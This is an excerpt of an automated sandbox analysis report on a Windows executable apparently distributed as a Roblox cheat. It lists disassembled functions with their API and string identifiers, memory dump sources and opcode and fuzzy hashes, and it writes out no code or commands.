                                                                                                                  • Instruction Fuzzy Hash: 5D91AE73A08B818AE710CB65E4403AD7BA0FB04788F10412AEF9D97B59EF3DD196D705
                                                                                                                  Function 00007FF6E7E44F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                  • String ID: csm$f
                                                                                                                  • API String ID: 2395640692-629598281
                                                                                                                  • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                                                  • Instruction ID: a62e4aefb05815d658c7014b801460d9657678c8eba1542a58efcf5223b34653
                                                                                                                  • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                                                  • Instruction Fuzzy Hash: 4451C437A1960686EB14CB15E444B3937A5FB44B88F508130DEAE87748FF7EE842E749
                                                                                                                  Function 00007FF6E7E1CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                  • API String ID: 2102711378-639343689
                                                                                                                  • Opcode ID: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
                                                                                                                  • Instruction ID: 641729a532907af1bf88df8111544c7bc827a655b0a540e397c20f199fec00eb
                                                                                                                  • Opcode Fuzzy Hash: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
                                                                                                                  • Instruction Fuzzy Hash: 2D51C763F1474285FB10DB64E8523BD2361AF857A4F000131DEEDD76D6DE3EA48AC24A
                                                                                                                  Function 00007FF6E7E37B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Show$Rect
                                                                                                                  • String ID: RarHtmlClassName
                                                                                                                  • API String ID: 2396740005-1658105358
                                                                                                                  • Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                                                                  • Instruction ID: 034f5ea47a6e8faa615c6512e95ac9d310f7b489e9c920e6d248f96177645ee1
                                                                                                                  • Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                                                                  • Instruction Fuzzy Hash: 7F51A423A0878296EB24DB25E44837A77A1FF89B90F004035DEDE87BA5DF3EE4458705
                                                                                                                  Function 00007FF6E7E3FED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                  • API String ID: 0-56093855
                                                                                                                  • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                                                  • Instruction ID: 04d2e266c7e45381d4c4f0753807d0b732844062d125e520662a974bc3090772
                                                                                                                  • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                                                  • Instruction Fuzzy Hash: 2821EB23908B47A0FA149B19F84837567A1EF4AB84F140036D9EDC73B2DF3EE594834A
                                                                                                                  Function 00007FF6E7E4BFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                                                  • Instruction ID: 1fae62a4044ce543a95f18d336119d497aae075e45a453a9fd115ea3a8316f84
                                                                                                                  • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                                                  • Instruction Fuzzy Hash: E9F0C227A19A4681EF448B11F4553792360EF88B94F041035D9AF83264DE3EE485C706
                                                                                                                  Function 00007FF6E7E545C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3215553584-0
                                                                                                                  • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                                                  • Instruction ID: 94edb47dae920bd5f8e606f58434693acfced69ba7bdc0c579eafa83a6a59421
                                                                                                                  • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                                                  • Instruction Fuzzy Hash: 8981EF63E1875A89F7109B65E8407BC27A0BB46B88F404135DEAED7695DF3EE442C30A
                                                                                                                  Function 00007FF6E7E23AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2398171386-0
                                                                                                                  • Opcode ID: 94d33130e0d3e07453908689b86af48371af1e3e167329ed22bda644dbf2c176
                                                                                                                  • Instruction ID: 9c3bee69ca578bbb1da5d533caf5748580eae07be80352602466d61f631188a2
                                                                                                                  • Opcode Fuzzy Hash: 94d33130e0d3e07453908689b86af48371af1e3e167329ed22bda644dbf2c176
                                                                                                                  • Instruction Fuzzy Hash: 8751C063B18A8349FB50CF75E8403BD23B1AB847A8F004635DEAD87BD8DE3D94558709
                                                                                                                  Function 00007FF6E7E53F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3659116390-0
                                                                                                                  • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                                                  • Instruction ID: f961f7f4080ae34af57909e06e21e3af44933a1033810fc058120509a9caf730
                                                                                                                  • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                                                  • Instruction Fuzzy Hash: B051E073A18A5589E710CB25E8403AC3BB1FB45798F148135CEAE97B98DF3ED146C706
                                                                                                                  Function 00007FF6E7E41E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 262959230-0
                                                                                                                  • Opcode ID: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
                                                                                                                  • Instruction ID: fa5709f2062de903be3c826c22916e17991858e5c06925ff46c70176fbddd723
                                                                                                                  • Opcode Fuzzy Hash: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
                                                                                                                  • Instruction Fuzzy Hash: 5141BF23A0964A8AEF149F21E4403782291EF44BA4F544634EABDC77D5EF3EE1539309
                                                                                                                  Function 00007FF6E7E4F414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 190572456-0
                                                                                                                  • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                                                  • Instruction ID: f05a5ec56e6f65322ac58aa9d23789e5c0accd0f0d885b82640189500dfb535d
                                                                                                                  • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                                                  • Instruction Fuzzy Hash: 1941C033B19A4281FA198B52E9007756296BB04B90F1D4535DEBDCB644EF3EE501934A
                                                                                                                  Function 00007FF6E7E556D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _set_statfp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1156100317-0
                                                                                                                  • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                                  • Instruction ID: 1d47dc972bf45c50422c69f7a8fb773be33edf70f0995802d245a9dd530f4014
                                                                                                                  • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                                  • Instruction Fuzzy Hash: 89118F37E1CB0F81F6541324F54237916436F553A0E484634EAFECA6D6DE6EB640660F
                                                                                                                  Function 00007FF6E7E3FE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3621893840-0
                                                                                                                  • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                                                  • Instruction ID: 110d8460b1beea5c260b2b8b247b0c1c5ebe1d225c7739cfd5cc0d4eb3478c8f
                                                                                                                  • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                                                  • Instruction Fuzzy Hash: F4F04F33F2844792F7109721E459B362311FFA4B05F441130E59EC58A5DF2ED149C705
                                                                                                                  Function 00007FF6E7E4625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __except_validate_context_recordabort
                                                                                                                  • String ID: csm$csm
                                                                                                                  • API String ID: 746414643-3733052814
                                                                                                                  • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                                                  • Instruction ID: 9b39da8795704562c565279620d912b55913018f2c87b01ce66c200e04929ba0
                                                                                                                  • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                                                  • Instruction Fuzzy Hash: 4371C173A0868186DB608F25D05077D7BB0FB41B88F148136DAEC87A89EF3DD592D74A
                                                                                                                  Function 00007FF6E7E480F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID: $*
                                                                                                                  • API String ID: 3215553584-3982473090
                                                                                                                  • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                                                  • Instruction ID: 5b27fa82a556aab6266c0f62f981d0427155826cac670686b043f708ea94c0ff
                                                                                                                  • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                                                  • Instruction Fuzzy Hash: 7851487390CA528AE7658F28C45537C37A1FB05B18F141136C6EAC5299EF3ED483E68E
                                                                                                                  Function 00007FF6E7E51758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$StringType
                                                                                                                  • String ID: $%s
                                                                                                                  • API String ID: 3586891840-3791308623
                                                                                                                  • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                                                  • Instruction ID: 060a50e47c03aaf84de3f19240913f5e3e362453f8f1fdf57d068bfe5d5e89bd
                                                                                                                  • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                                                  • Instruction Fuzzy Hash: 0341A933B15B8589EB618F25E8003A96392FB54BA8F480235DEAD877C5DF3DE4418346
                                                                                                                  Function 00007FF6E7E466A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
